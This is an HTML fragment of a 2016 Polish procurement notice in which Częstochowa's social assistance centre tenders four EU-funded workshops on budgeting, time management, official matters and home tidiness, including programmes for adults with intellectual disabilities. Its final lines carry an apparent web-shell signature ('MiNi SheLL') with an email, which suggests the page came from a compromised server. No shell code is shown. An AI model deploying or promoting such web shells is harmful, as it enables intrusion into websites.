<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn.: Zmieniając dziś, projektujesz lepsze jutro realizowany w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020, Osi Priorytetowej IX Włączenie społeczne, Działania 9.1 Aktywna integracja, Poddziałania 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym - tryb pozakonkursowy, współfinansowany z Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego na podstawie umowy o dofinansowanie zawartej pomiędzy Gminą Miastem Częstochowa, w imieniu której działa Miejski Ośrodek Pomocy Społecznej w Częstochowie, a Samorządem Województwa Śląskiego występującym w roli Instytucji Zarządzającej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Trening ekonomii gospodarstwa domowego oraz zasad prowadzenia budżetu domowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie treningu ekonomii gospodarstwa domowego oraz zasad prowadzenia budżetu domowego dla uczestników projektu pozakonkursowego pn. Zmieniając dziś, projektujesz lepsze jutro realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020, Osi Priorytetowej IX Włączenie społeczne, Działania 9.1 Aktywna integracja, Poddziałania 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym - tryb pozakonkursowy. UCZESTNICY: W warsztatach weźmie udział maksymalnie 176 osób (w tym 6 osób dorosłych z niepełnosprawnością intelektualną). Uczestnicy zostaną podzieleni na grupy 10-osobowe. Odrębną grupę będą stanowiły osoby dorosłe z niepełnosprawnością intelektualną - grupa 6-osobowa. WYMIAR CZASOWY ZAJĘĆ: 1. Zajęcia będą odbywały się w dni robocze od poniedziałku do piątku, w przedziale czasowym pomiędzy godziną 9:00 a 18:00. 2. Czas trwania zajęć nie może przekroczyć 5 godzin dydaktycznych dziennie (1 godzina = 45 min.) dla każdej 10-osobowej grupy uczestników (w tym czas przewidziany na przerwy kawowe). Każda z tych grup spotka się z trenerem 2 razy. Czas trwania zajęć dla grupy osób z niepełnosprawnością intelektualną nie może natomiast przekroczyć 3 godzin dydaktycznych dziennie (1 godzina = 45 min.). Grupa 6-osobowa spotka się z trenerem 3 razy. 3. Na każdego uczestnika przypadać będzie odpowiednio: 1) 10 godzin dydaktycznych zajęć dla grup 10-osobowych; 2) 9 godzin dydaktycznych zajęć w przypadku grupy osób z niepełnosprawnością intelektualną. 4. W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie warsztatów dla wskazanej powyżej liczby osób, Zamawiający zastrzega sobie prawo zmniejszenia ostatecznej liczby osób skierowanych na warsztaty o 20 % (tj. min. 140 osób) CEL: Celem warsztatów jest poznanie przez uczestników zasad racjonalnego gospodarowania budżetem domowym, planowania i kontroli wydatków oraz efektywnych sposobów oszczędzania. Warsztaty będą obejmować zagadnienia dotyczące: umiejętności radzenia sobie w sytuacjach kryzysowych, sposobów czytania ofert banków oraz firm oferujących kredyty, a także możliwości uniknięcia pułapek w umowach bankowych. Uczestnicy zdobędą wiedzę na temat psychologicznych i prawnych konsekwencji zadłużania się. Dowiedzą się w jaki sposób skonstruować i zbilansować prosty budżet domowy oraz opracować indywidualne strategie wychodzenia ze spirali zadłużenia. Dzięki warsztatom uczestnicy zwiększą świadomość finansową w swojej rodzinie oraz poznają zasady rozmawiania z domownikami (dziećmi) o pieniądzach. PROGRAM: 1. Zajęcia pierwsze (teoretyczne): 1) Jak stworzyć budżet? a) przykładowy budżet domowy, b) zakupy codzienne i okazyjne, c) planowe i celowe zarządzanie budżetem, d) kontrola i monitorowanie przepływów gotówki i jej zmienność w czasie. 2) Oszczędzanie bez wyrzeczeń: a) definiowanie źródeł niekontrolowanych wypływów, b) klasyfikacja i funkcje wydatków, c) negocjacje w codziennych sprawach i zakupach, d) domowy fundusz na czarną godzinę. 3) Pułapki finansowe: a) zaciąganie kredytów i pożyczek tzw. chwilówek, b) konsekwencje psychologiczne i prawne wynikające z zaciągania zobowiązań finansowych, c) indywidualne strategie wychodzenia ze spirali zadłużenia, d) jak unikać złych finansowych decyzji? 2. Zajęcia drugie (ćwiczenia warsztatowe). Trening budżetowy dla grupy osób z niepełnosprawnością intelektualną winien obejmować następujące tematy: 1) Poznanie wartości pieniądza; 2) Umiejętność samodzielnych zakupów; 3) Planowanie wydatków; 4) Nauka przygotowania listy zakupów - potrzebnych artykułów spożywczych; 5) Rozpoznawanie przydatności do użycia poszczególnych produktów; 6) Nauka odczytywania daty ważności artykułów; 7) Nabycie i doskonalenie orientacji w cenach i dokonywanie obliczeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie Wykonawcy - 40</li>
<li>3. Dostosowanie lokalu przeznaczonego do realizacji zajęć do potrzeb osób niepełnosprawnych - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Trening efektywnego zarządzania sobą w czasie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEDMIOT ZAMÓWIENIA: Przedmiotem zamówienia jest organizacja i przeprowadzenie treningu efektywnego zarządzania sobą w czasie dla uczestników projektu pozakonkursowego pn. Zmieniając dziś, projektujesz lepsze jutro realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020, Osi Priorytetowej IX Włączenie społeczne, Działania 9.1 Aktywna integracja, Poddziałania 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym - tryb pozakonkursowy. UCZESTNICY: W warsztatach weźmie udział maksymalnie 186 osób (w tym 6 osób dorosłych z niepełnosprawnością intelektualną). Uczestnicy zostaną podzieleni na grupy 10-osobowe. Odrębną grupę będą stanowiły osoby  z niepełnosprawnością intelektualną - grupa 6-osobowa. WYMIAR CZASOWY ZAJĘĆ: 1. Zajęcia będą odbywały się w dni robocze od poniedziałku do piątku, w przedziale czasowym pomiędzy godziną 9:00 a 18:00. 2. Czas trwania zajęć nie może przekroczyć 5 godzin dydaktycznych dziennie (1 godzina = 45 min.) dla każdej 10-osobowej grupy uczestników (w tym czas przewidziany na przerwy kawowe). Każda z tych grup spotka się z trenerem 2 razy. Czas trwania zajęć dla grupy osób z niepełnosprawnością intelektualną nie może natomiast przekroczyć 3 godzin dydaktycznych dziennie (1 godzina = 45 min.). Grupa 6-osobowa spotka się z trenerem 3 razy. 3. Na każdego uczestnika przypadać będzie odpowiednio: 1) 10 godzin dydaktycznych zajęć dla grup 10-osobowych; 2) 9 godzin dydaktycznych zajęć w przypadku grupy osób z niepełnosprawnością intelektualną. 4. W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie warsztatów dla wskazanej powyżej liczby osób, Zamawiający zastrzega sobie prawo zmniejszenia ostatecznej liczby osób skierowanych na warsztaty o 20 % (tj. min. 149 osób). CEL: Celem warsztatów będzie podwyższenie kompetencji z zakresu skutecznego planowania i organizowania dnia, nabycie umiejętności prawidłowego określania celów, poznanie narzędzi usprawniających zarządzanie czasem, wypracowanie optymalnych metod zarządzania sobą w czasie oraz własnych zasad zarządzania czasem, nabycie umiejętności radzenia sobie ze złymi nawykami i złodziejami czasu, dostarczenie wiedzy i praktycznych wskazówek dotyczących zwiększenia efektywności i wydajności pracy. PROGRAM: 1) Reguły zarządzania czasem (7 technik zarządzania sobą w czasie); 2) Wyznaczenie celów krótkoterminowych i perspektywicznych - jak skonstruować cel by zwiększyć szanse na jego realizację; 3) Ustalanie priorytetów, podział zadań na pilne i niepilne, ważne i nieważne; 4) Złodzieje czasu - pochłaniacze czasu, przerywacze pracy (przyczyny i metody walki z odkładaniem zadań na później); 5) Narzędzia pomocne w zarządzaniu sobą w czasie; 6) Najczęstsze błędy planowania; 7) Identyfikacja zgubnych, ulubionych nawyków. Trening efektywnego zarządzania sobą w czasie dla osób z niepełnosprawnością intelektualną winien obejmować poniższe tematy: 1) Jak umiejętnie zagospodarować czas wolny?; 2) Znajomość form spędzania czasu wolnego - kino, teatr, wycieczki i wyjazdy krajoznawcze, zwiedzanie muzeów, zabytków, zawody sportowe, występy i pokazy artystyczne; 3) Samodzielne poruszanie się w przestrzeni publicznej (np. czytanie rozkładów jazdy autobusów); 4) Odczytywanie czasu - sprawne posługiwanie się zegarkiem; 5) Jak radzić sobie z nieplanowanymi (zaskakującymi) sytuacjami (np. autobus się spóźnił)?; 6) Zasady samodzielnego poruszania się po mieście; 7) Wybór ubioru stosownego do warunków atmosferycznych, miejsca, sytuacji, itp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie Wykonawcy - 40</li>
<li>3. Dostosowanie lokalu przeznaczonego do realizacji zajęć do potrzeb osób niepełnosprawnych - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warsztaty samodzielnego załatwiania spraw urzędowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEDMIOT ZAMÓWIENIA: Przedmiotem zamówienia jest organizacja i przeprowadzenie warsztatów samodzielnego załatwiania spraw urzędowych dla uczestników projektu pozakonkursowego pn. Zmieniając dziś, projektujesz lepsze jutro realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020, Osi Priorytetowej IX Włączenie społeczne, Działania 9.1 Aktywna integracja, Poddziałania 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym - tryb pozakonkursowy. UCZESTNICY: W warsztatach weźmie udział maksymalnie 126 osób (w tym 6 osób dorosłych z niepełnosprawnością intelektualną). Uczestnicy zostaną podzieleni na grupy 10-osobowe. Odrębną grupę będą stanowiły osoby z niepełnosprawnością intelektualną - grupa 6-osobowa. WYMIAR CZASOWY ZAJĘĆ: 1. Zajęcia będą odbywały się w dni robocze od poniedziałku do piątku, w przedziale czasowym pomiędzy godziną 9:00 a 18:00. 2. Czas trwania zajęć nie może przekroczyć 5 godzin dydaktycznych dziennie (1 godzina = 45 min.) dla każdej 10-osobowej grupy uczestników (w tym czas przewidziany na przerwy kawowe). Każda z tych grup spotka się z trenerem 2 razy. Czas trwania zajęć dla grupy osób z niepełnosprawnością intelektualną nie może natomiast przekroczyć 3 godzin dydaktycznych dziennie (1 godzina = 45 min.). Grupa 6-osobowa spotka się z trenerem 3 razy. 3. Na każdego uczestnika przypadać będzie odpowiednio: 1) 10 godzin dydaktycznych zajęć dla grup 10-osobowych; 2) 9 godzin dydaktycznych zajęć w przypadku grupy osób z niepełnosprawnością intelektualną. 4. W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie warsztatów dla wskazanej powyżej liczby osób, Zamawiający zastrzega sobie prawo zmniejszenia ostatecznej liczby osób skierowanych na warsztaty o 20 % (tj. min. 101 osób). CEL: Celem warsztatów będzie kształtowanie umiejętności samodzielnego załatwiania różnych spraw urzędowych, wypełniania dokumentów, sporządzania wniosków, prowadzenia rozmów z urzędnikami oraz kształtowanie samodzielności i zasad współżycia w środowisku. PROGRAM: 1) Podstawowe prawa obywatela w urzędzie; 2) Nabycie umiejętności pisania pism, podań, wypełniania dokumentów urzędowych (wspólnie wypełnianie z uczestnikiem wniosków, podań, oświadczeń); 3) Poprawne rozumienie pism urzędowych; 4) Sposoby gromadzenia przez uczestnika dokumentacji niezbędnej do załatwienia określonej sprawy np. uzyskania pomocy z Ośrodka Pomocy Społecznej, rozliczenia podatkowego z Urzędem Skarbowym, przygotowania się do komisji lekarskiej w Zakładzie Ubezpieczeń Społecznych, złożenia podania w różnego rodzaju urzędach lub instytucjach; 5) Podstawowe zasady komunikacji w relacji petent a urzędnik (ćwiczenie rozmowy telefonicznej). Warsztaty samodzielnego załatwiania spraw urzędowych dla osób z niepełnosprawnością intelektualną winny obejmować poniższe tematy: 1) Doskonalenie umiejętności nawiązywania kontaktów z urzędnikiem, podtrzymywania rozmowy oraz aktywnego słuchania; 2) Prawidłowość zachowania się w miejscach publicznych; 3) Sposoby załatwiania spraw w różnych instytucjach, podmiotach publicznych (poczta,przychodnia, bank, spółdzielnie mieszkaniowe itp.); 4) Jak zlokalizować ważne dla uczestnika adresy urzędów i instytucji; 5) Właściwe rozpoznawanie problemu i identyfikacja instytucji, do której można się zgłosić po pomoc..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie Wykonawcy - 40</li>
<li>3. Dostosowanie lokalu przeznaczonego do realizacji zajęć do potrzeb osób niepełnosprawnych - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Warsztaty porządkowania przestrzeni wokół siebie - czyli jak dbać o ład i porządek najbliższego otoczenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PRZEDMIOT ZAMÓWIENIA: Przedmiotem zamówienia jest organizacja i przeprowadzenie warsztatów porządkowania przestrzeni wokół siebie (dbanie o ład i porządek najbliższego otoczenia) dla uczestników projektu pozakonkursowego pn. Zmieniając dziś, projektujesz lepsze jutro realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020, Osi Priorytetowej IX Włączenie społeczne, Działania 9.1 Aktywna integracja, Poddziałania 9.1.6 Programy aktywnej integracji osób i grup zagrożonych wykluczeniem społecznym - tryb pozakonkursowy. UCZESTNICY: W warsztatach weźmie udział maksymalnie 106 osób (w tym 6 osób dorosłych z niepełnosprawnością intelektualną). Uczestnicy zostaną podzieleni na grupy 10-osobowe. Odrębną grupę będą stanowiły osoby z niepełnosprawnością intelektualną - grupa 6-osobowa. WYMIAR CZASOWY ZAJĘĆ: 1. Zajęcia będą odbywały się w dni robocze od poniedziałku do piątku, w przedziale czasowym pomiędzy godziną 9:00 a 18:00. 2. Czas trwania zajęć nie może przekroczyć 5 godzin dydaktycznych dziennie (1 godzina = 45 min.) dla każdej 10-osobowej grupy uczestników (w tym czas przewidziany na przerwy kawowe). Każda z tych grup spotka się z trenerem 2 razy. Czas trwania zajęć dla grupy osób z niepełnosprawnością intelektualną nie może natomiast przekroczyć 3 godzin dydaktycznych dziennie (1 godzina = 45 min.). Grupa 6-osobowa spotka się z trenerem 4 razy. 3. Na każdego uczestnika przypadać będzie odpowiednio: 1) 10 godzin dydaktycznych zajęć dla grup 10-osobowych; 2) 12 godzin dydaktycznych zajęć w przypadku grupy osób z niepełnosprawnością intelektualną. 4. W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się przeprowadzenie warsztatów dla wskazanej powyżej liczby osób, Zamawiający zastrzega sobie prawo zmniejszenia ostatecznej liczby osób skierowanych na warsztaty o 20 % (tj. min. 85 osób). CEL: Celem warsztatów będzie podniesienie umiejętności sprzątania i organizacji życia domowego poprzez udzielenie uczestniczkom praktycznych wskazówek jak lepiej zagospodarować otoczenie wokół siebie i tym samym wpłynąć na poprawę jakości i stylu ich życia. PROGRAM 1) Sposoby utrzymywania porządku wokół siebie; 2) Selekcja i segregacja przedmiotów; 3) Podstawowe środki chemiczne stosowane do sprzątania mieszkań; 4) Sposoby odróżnienia rzeczy przydatnych i cennych od niepotrzebnych; 5) Sposoby zmiany złych nawyków utrudniających utrzymanie porządku; 6) Ekonomia w używaniu detergentów - domowe sposoby; 7) Pranie, prasowanie, odplamianie; 8) Prawidłowa kolejność czynności wykonywanych w trakcie sprzątania (pranie, prasowanie, odplamianie itp.). Warsztaty porządkowania przestrzeni wokół siebie (dbanie o ład i porządek najbliższego otoczenia) dla osób z niepełnosprawnością intelektualną winny obejmować poniższe tematy: 1) Nauka i doskonalenie umiejętności obsługi sprzętu AGD (np. kuchenka, piekarnik elektryczny, kuchenka mikrofalowa, robot kuchenny, opiekacz, żelazko) oraz zagrożenia związane z obsługą tych urządzeń; 2) Doskonalenie czynności samoobsługowych (prasowanie, składanie ubrań, rozwieszanie wypranej bielizny); 3) Prawidłowa kolejność czynności wykonywanych w trakcie sprzątania; 4) Wdrażanie zasad higieny osobistej poprzez wyrobienie nawyku częstego mycia rąk (np. po wyjściu z toalety); 5) Dbanie o czystość i porządek w domu oraz zapoznanie z asortymentem i zasadami stosowania środków czystości; 6) Sposoby estetycznego nakrywania do stołu, dekoracji potraw oraz zasad zachowania się przy stole podczas spożywania posiłków..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie Wykonawcy - 40</li>
<li>3. Dostosowanie lokalu przeznaczonego do realizacji zajęć do potrzeb osób niepełnosprawnych - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com